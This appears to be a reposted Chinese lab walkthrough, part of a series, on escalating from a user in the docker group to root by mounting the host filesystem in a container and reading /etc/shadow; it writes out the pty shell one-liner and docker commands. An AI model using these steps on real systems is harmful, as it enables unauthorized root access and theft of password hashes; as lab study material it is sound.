书接上回
实验环境一样的
第八篇 我们用ssh密钥登岸后 发现我们web1的权限
当我们拿到web1的权限时 我们无法提权(这里我用的继续十二的环境 各人也可以继续)
所以我们起首要提权(当然必须是一个完整的 tty shell 不会的 我们去看第二篇 当然我下边也给你表注明了)
python3 -c 'import pty;pty.spawn("/bin/bash")';
我们输入id 发现 里边有docker 的权限
我们输入 groups 查看组信息
发现里边还有docker
所以我们准备提权
web1 具体docker用户组的权限
下边是常识 你们相识
默认情况下,Docker 软件包是会默认添加一个 docker 用户组的。Docker 守卫进程会答应 root 用户和 docker组用户访问 Docker,给用户提供 Docker 权限;
用户在创建一个docker容器后,容器内默认是root账户,在不需要加sudo的情况下可以任意更改容器内的配置。
正常情况下,这种模式既可以包管一台机器被很多普通用户利用,通过docker容器的隔离,相互之前互不影响;也给用户在容器内开放了充足的权限包管用户可以正常安装软件,修改容器配置等操作。
普通用户假如要想利用 docker,而且不想给 sudo 权限,那么一般会选择把该用户加入 docker 用户组内,同时在 docker 容器内是具有 root 权限的,这样包管了用户对容器的完全控制;
linux~Docker容器提权_docker 创建容器提权-CSDN博客
输入命令下载利用容器把容器的目录挂载到宿主的根目录
docker run-v/:/mnt -it alpine 会自动从网上查找alpine镜像文件 来下载
不知道docker指令的 可以看下一篇文章
Docker常用命令大全(非常详细)零基础入门到醒目,收藏这一篇就够了-CSDN博客
起首 我们先来查看容器镜像
我们发现已经具有了 alpine 我们为了演示
所以我们要举行删除镜像
docker rmi -f alpine
这下我们在举行下载
docker run -v/:/mnt -it alpine
期待下载
换了镜像也不可 我只能试试 别的镜像了
先删除hello -world 镜像
docker run -v/:/mnt -it hello-world
拉取乐成
我刚才意识到 我换源忘了换Ubuntu的源
现在换了 就好了
这个就是根目录
我们来访问 cat /etc/shadow
输入错了
cat etc/shadow
现在我就是以root身份来查看了
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
